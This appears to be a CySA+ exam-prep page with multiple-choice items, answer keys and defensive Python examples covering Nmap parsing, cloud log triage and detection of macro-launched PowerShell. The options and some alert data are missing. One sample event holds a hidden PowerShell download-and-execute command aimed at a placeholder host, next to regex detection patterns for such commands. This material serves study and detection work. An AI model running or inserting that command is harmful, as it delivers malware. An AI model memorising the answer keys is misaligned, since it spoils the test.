An analyst investigated a website and produced the following:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 10:21 CDT
Nmap scan report for insecure.org (45.33.49.119)
Host is up (0.054s latency).
rDNS record for 45.33.49.119: ack.nmap.org
Not shown: 95 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
25/tcp closed smtp
80/tcp open http Apache httpd 2.4.6
113/tcp closed ident
443/tcp open ssl/http Apache httpd 2.4.6
Service Info: Host: issues.nmap.org
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds
Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?
Answer : C
The analyst used the command nmap -sV -T4 -F insecure.org to discover the application versions on the vulnerable website. The -sV option in Nmap is used to perform version detection, which identifies the versions of the services running on open ports. The -T4 option sets the timing template for faster execution, and -F scans only the most common ports.
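As an added illustration (not part of the original question and not Nmap's own code), the following Python parses the normal-format scan report above and checks the two facts the explanation relies on: the VERSION column is populated only for open ports where -sV obtained a banner, and 95 not-shown ports plus the 5 listed ports equals the 100 ports that -F scans. The report text is embedded as constructed sample input; the parser handles both the single-space layout shown on the page and Nmap's usual column-aligned output.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: a copy of the scan report from the question above.
NMAP_OUTPUT = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 10:21 CDT
Nmap scan report for insecure.org (45.33.49.119)
Host is up (0.054s latency).
rDNS record for 45.33.49.119: ack.nmap.org
Not shown: 95 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh      OpenSSH 7.4 (protocol 2.0)
25/tcp  closed smtp
80/tcp  open   http     Apache httpd 2.4.6
113/tcp closed ident
443/tcp open   ssl/http Apache httpd 2.4.6
Service Info: Host: issues.nmap.org
Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds
"""


@dataclass
class PortResult:
    port: int
    proto: str
    state: str
    service: str
    version: Optional[str]  # None when -sV produced no banner (e.g. closed ports)


PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
NOT_SHOWN = re.compile(r"^Not shown: (\d+) ")


def parse_nmap(text: str) -> dict:
    """Parse normal (non-XML) nmap output into port records and port counts."""
    ports, not_shown = [], 0
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append(PortResult(int(port), proto, state, service, version or None))
            continue
        m = NOT_SHOWN.match(line)
        if m:
            not_shown = int(m.group(1))
    return {"ports": ports, "not_shown": not_shown, "total_scanned": not_shown + len(ports)}


def versioned_services(parsed: dict) -> list:
    """Open ports where -sV returned a product/version string (the exposed service surface)."""
    return [(p.port, p.service, p.version) for p in parsed["ports"]
            if p.state == "open" and p.version]


def infer_port_option(parsed: dict) -> str:
    """Map the total number of scanned ports back to the nmap option that selects them."""
    total = parsed["total_scanned"]
    if total == 100:
        return "-F"            # fast scan: top 100 ports
    if total == 1000:
        return "default"       # no port option: top 1000 ports
    if total == 65535:
        return "-p-"           # every TCP port
    return f"custom ({total} ports)"


if __name__ == "__main__":
    result = parse_nmap(NMAP_OUTPUT)
    print("port option:", infer_port_option(result))
    for port, service, version in versioned_services(result):
        print(f"{port}/tcp {service}: {version}")
```

The same parser applies to any host's normal-format output; for automated pipelines, prefer `nmap -oX` and an XML parser, since the text format is meant for humans and its columns can shift.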
A security operations center receives the following alerts related to an organization's cloud tenant:
Which of the following should an analyst do first to identify the initial compromise?
Answer : B
To identify the initial compromise, the analyst should start with the earliest suspicious activity in the timeline and pivot into the audit logs for the principal (identity) associated with that first alert.
Here, the first notable event is 02:00 excessive API failures tied to jdoe12@myorg.com. That commonly indicates password guessing, token misuse, or other authentication abuse attempts. The next events (02:15 metadata service access, 05:10 mass VM creation by a service account, 05:40 malware) look like follow-on activity after an initial foothold. Therefore, the best first step is to check whether those API failures were followed by any successful API calls by that user and then correlate those successful actions to the later stages in project staging-01.
This approach aligns with CySA+ guidance that analysts should use logs + timestamps to build a timeline and correlate events across identities/systems to understand scope and progression:
Sybex emphasizes correlating events from multiple sources and using that correlation to determine scope and impact:
Exact extract (Sybex Study Guide): ''Security analysts are often asked to help analyze that data... Knowing if other events are correlated with the initial event... [and] understanding what systems, users, services, or other assets were involved...''
Secbay underscores that logs and timestamps are key to forming an accurate incident timeline (which is exactly what we're doing by starting from the earliest alert):
Exact extract (Secbay Press): ''System and application logs with timestamps help create a timeline of events, aiding in understanding when specific actions occurred during the incident.''
Why Option B is best vs. the others
B starts with the earliest suspicious identity and seeks successful API activity that would confirm compromise and explain the subsequent actions (metadata access, service-account actions, malware).
A is too broad initially (''all activity under project staging-01'') and anchors on a VM that only appears later; it's not the best first pivot when you already have an earlier suspect identity.
C starts at the compute-instance phase (05:10) rather than the earliest authentication/API anomaly (02:00), so it's more likely to find post-compromise actions rather than the initial entry.
D anchors on a specific later VM (fd031f) and compute APIs, again likely after the initial compromise.
Reference (CompTIA CySA+ CS0-003 documents / study guides used):
Mike Chapple & David Seidl, CompTIA CySA+ Study Guide (CS0-003): correlate other events with the initial event; identify involved users/systems/services
Secbay Press, CompTIA CySA+ Exam Prep Guide (CS0-003): logs + timestamps build a timeline of events and support analysis of incident progression
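The pivot described in the explanation above (start from the earliest failure burst, confirm compromise by finding the first successful API call from that principal, then correlate everything that follows in the same project) as a runnable Python example. This is added illustration, not code from the question or from any cloud provider; the audit-log records, action names and the build-sa / edr-sensor principals are constructed to mirror the timeline in the question.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def _ev(ts, principal, action, status, project, resource=None):
    return {"ts": _ts(ts), "principal": principal, "action": action,
            "status": status, "project": project, "resource": resource}


# Constructed audit-log sample modelled on the alert timeline in the question.
# Action names and the build-sa / edr-sensor principals are invented for the example.
AUDIT_LOG = [_ev(f"2024-01-01T02:0{i}:00Z", "jdoe12@myorg.com", "ListInstances",
                 "PERMISSION_DENIED", "staging-01") for i in range(8)]
AUDIT_LOG += [
    _ev("2024-01-01T02:15:00Z", "jdoe12@myorg.com", "GetInstanceMetadata", "OK", "staging-01"),
    _ev("2024-01-01T03:00:00Z", "asmith@myorg.com", "ListBuckets", "OK", "prod-02"),
    _ev("2024-01-01T05:10:00Z", "build-sa@staging-01", "CreateInstance", "OK", "staging-01", "vm-fd031f"),
    _ev("2024-01-01T05:40:00Z", "edr-sensor", "MalwareDetected", "ALERT", "staging-01", "vm-fd031f"),
]

FAILURE_STATUSES = {"PERMISSION_DENIED", "UNAUTHENTICATED"}


def earliest_failure_burst(log, threshold=5, window=timedelta(minutes=10)):
    """Return (principal, burst_start) for the earliest principal with >= threshold failures in one window."""
    failures = defaultdict(list)
    for e in sorted(log, key=lambda e: e["ts"]):
        if e["status"] in FAILURE_STATUSES:
            failures[e["principal"]].append(e["ts"])
    best = None
    for principal, times in failures.items():
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                if best is None or times[i] < best[1]:
                    best = (principal, times[i])
                break  # earliest burst for this principal found
    return best


def first_success_after(log, principal, after):
    """First successful API call by the principal after the burst: the step that confirms compromise."""
    for e in sorted(log, key=lambda e: e["ts"]):
        if e["principal"] == principal and e["status"] == "OK" and e["ts"] > after:
            return e
    return None


def follow_on_events(log, project, after):
    """Everything in the same project after the confirmed success, regardless of principal."""
    return [e for e in sorted(log, key=lambda e: e["ts"])
            if e["project"] == project and e["ts"] > after]


def investigate(log) -> dict:
    """Run the three pivots in order and return a compact timeline for the analyst."""
    burst = earliest_failure_burst(log)
    if burst is None:
        return {"suspect": None}
    principal, start = burst
    success = first_success_after(log, principal, start)
    chain = follow_on_events(log, success["project"], success["ts"]) if success else []
    return {
        "suspect": principal,
        "burst_start": start.strftime("%H:%M"),
        "first_success": success["action"] if success else None,
        "follow_on": [(e["ts"].strftime("%H:%M"), e["principal"], e["action"]) for e in chain],
    }


if __name__ == "__main__":
    for key, value in investigate(AUDIT_LOG).items():
        print(f"{key}: {value}")
```

If `first_success_after` returns nothing, the failures were noise or the attempt did not succeed, and the investigation should move to the next-earliest anomaly rather than assuming the later VM activity is connected.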
A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network traffic. Which of the following incident response steps should be performed next?
Answer : C
After detecting a compromised email server and unusual network traffic, the next step in incident response is containment, to prevent further damage or spread of the compromise. Reference: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5: Incident Response, page 197.
Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective actions?
Answer : C
Performing a vulnerability scan during the recovery phase ensures that corrective actions, such as patches or configuration changes, have effectively addressed the vulnerabilities exploited during the incident. This step validates the system's security before fully restoring operations.
A security analyst receives an alert for suspicious activity on a company laptop. An excerpt of the log is shown below:
Which of the following has most likely occurred?
Answer : A
"An Office document with a malicious macro was opened" is the most likely explanation for the suspicious activity on the company laptop, as it reflects the common technique of using macros to execute PowerShell commands that download and run malware. A macro is a piece of code that can automate tasks or perform actions in an Office document, such as a Word file or an Excel spreadsheet. Macros can be useful and legitimate, but they can also be abused by threat actors to deliver malware or perform malicious actions on the system. A malicious macro can be embedded in an Office document that is sent as an attachment in a phishing email or hosted on a compromised website. When the user opens the document, they may be prompted to enable macros or content, which triggers the execution of the malicious code. The malicious macro can then use PowerShell, a scripting language and command-line shell built into Windows, to perform various tasks, such as downloading and running malware from a remote URL, bypassing security controls, or establishing persistence on the system. The log excerpt shows that PowerShell was used to download a string from a URL using the WebClient.DownloadString method, which is a common way to fetch and execute malicious code from the internet. The log also shows that PowerShell was used to invoke an expression (iex) containing obfuscated code, another common way to evade detection and analysis. The other options are less likely, as they do not match the evidence in the log excerpt. "A credential-stealing website was visited" is possible, but it does not explain why PowerShell was used to download and execute code from a URL. "A phishing link in an email was clicked" is also possible, but it does not explain what happened after the link was clicked or how PowerShell was involved. "A web browser vulnerability was exploited" is unlikely, as it does not explain why PowerShell was used to download and execute code from a URL.
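The detection side of the explanation above, as an added Python example (not code from the question or from any EDR product): process-creation records are classified by whether an Office application spawned PowerShell and whether the command line carries the download-and-execute indicators the explanation names (WebClient.DownloadString, iex) plus a few common companions (hidden window, encoded command). The sample events, field names and the placeholder URL are constructed for the example.

```python
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Indicators named in the question (DownloadString, iex) plus common companions.
INDICATORS = {
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "eval": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "hidden": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


@dataclass
class ProcessEvent:
    """One process-creation record (constructed; field names follow the usual EDR/Sysmon shape)."""
    user: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent):
    """Return (verdict, indicator hits) for one process-creation event."""
    parent, child = _basename(event.parent_image), _basename(event.image)
    hits = [name for name, rx in INDICATORS.items() if rx.search(event.command_line)]
    office_spawned_shell = parent in OFFICE_APPS and child in SHELLS
    if office_spawned_shell and hits:
        return "macro-launched download-and-execute", hits
    if office_spawned_shell:
        return "office-spawned shell (review)", hits   # rare in normal use, worth a look
    if child in SHELLS and hits:
        return "download-and-execute without Office parent", hits
    return "benign", hits


# Constructed sample events; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcessEvent("CORP\\jdoe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/x')\""),
    ProcessEvent("CORP\\jdoe",
                 r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ProcessEvent("CORP\\asmith",
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Date"),
]


def triage(events):
    """Verdict per event, in input order."""
    return [classify(e)[0] for e in events]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, hits = classify(ev)
        print(f"{ev.user}: {verdict} {hits}")
```

The parent-child relationship is the stronger signal: an Office application has no routine reason to launch PowerShell, so that pairing alone merits review even when the command line is obfuscated enough to miss every string indicator.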